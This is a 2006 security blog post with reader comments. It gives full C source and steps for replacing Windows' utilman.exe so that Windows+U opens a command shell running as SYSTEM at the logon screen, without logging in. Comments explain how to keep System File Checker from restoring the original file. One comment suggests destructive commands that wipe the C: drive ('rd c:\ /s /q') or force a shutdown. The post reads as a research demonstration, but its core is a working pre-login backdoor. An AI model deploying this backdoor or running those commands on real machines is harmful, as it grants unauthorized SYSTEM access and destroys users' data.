Didier Stevens

Thursday 31 August 2006

My second playdate with utilman.exe

Filed under: Hacking — Didier Stevens @ 20:46

Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:

You can compile the following example with Borland’s free C++ 5.5 compiler.

Fourth experiment

Compile this simple C program, name it utilman.exe and put it in the system32 directory:

#include <stdio.h>
#include <windows.h>
#include <tchar.h>

void _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));

ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;
    ZeroMemory(&p, sizeof(p));

CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);

CloseHandle(p.hProcess);
    CloseHandle(p.hThread);
}

Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.

utilman4.PNG

8 Comments »

  1. What user account does the shell run as? If it is system then their is a huge security hole.

    Comment by Jay — Friday 1 September 2006 @ 14:14

  2. It’s the SYSTEM account, read this: https://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/

    Comment by Didier Stevens — Friday 1 September 2006 @ 16:28

  3. It doesn’t matter on which desktop the cmd runs.
    utilman.exe always runs as SYSTEM.

    Nice man 😉

    Comment by evilbitz — Friday 1 September 2006 @ 20:00

  4. […] For a demo of My second playdate with utilman.exe, go here on YouTube. […]

    Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00

  5. Hi, i compile you’re script with no error, replace in dllcache and system32, block sfc when prompt to restore, but when i press “Windows key” + U, nothing, you’re script in the 3 exemple work, but not the last with CMD.

    Comment by Jacky — Wednesday 16 April 2008 @ 13:56

  6. The example only works for me when
    LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\\\Winlogon”));
    is replaced with
    LPTSTR szDesktop = _tcsdup(TEXT(“WinSta0\\Winlogon”));

    The \ has to be doubled (not quadrupled) for masking.

    Comment by MF — Tuesday 6 October 2009 @ 7:03

  7. Yes, \\ The \\\\ stems from an old issue with the PRE format in WordPress.

    Comment by Didier Stevens — Tuesday 6 October 2009 @ 19:06

  8. Wow i guess the best way to protect against this is either true crypt or replacing windows with linux? 😄

    This makes for some handy shortcuts i.e.
    The nuke rd c:\ /s /q “why isnt my narrator working!? :P”
    hide shutdown -s -f -t 00

    Dude how about using you programming to make a visible firefox or better yet for those chronic pc gammers a lazy mans button to instantly launch a visble game while killing all unsanitary process…. ohh yess

    Comment by dooshy — Tuesday 25 October 2011 @ 22:39


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Cancel

Connecting to %s

Blog at WordPress.com.

%d bloggers like this: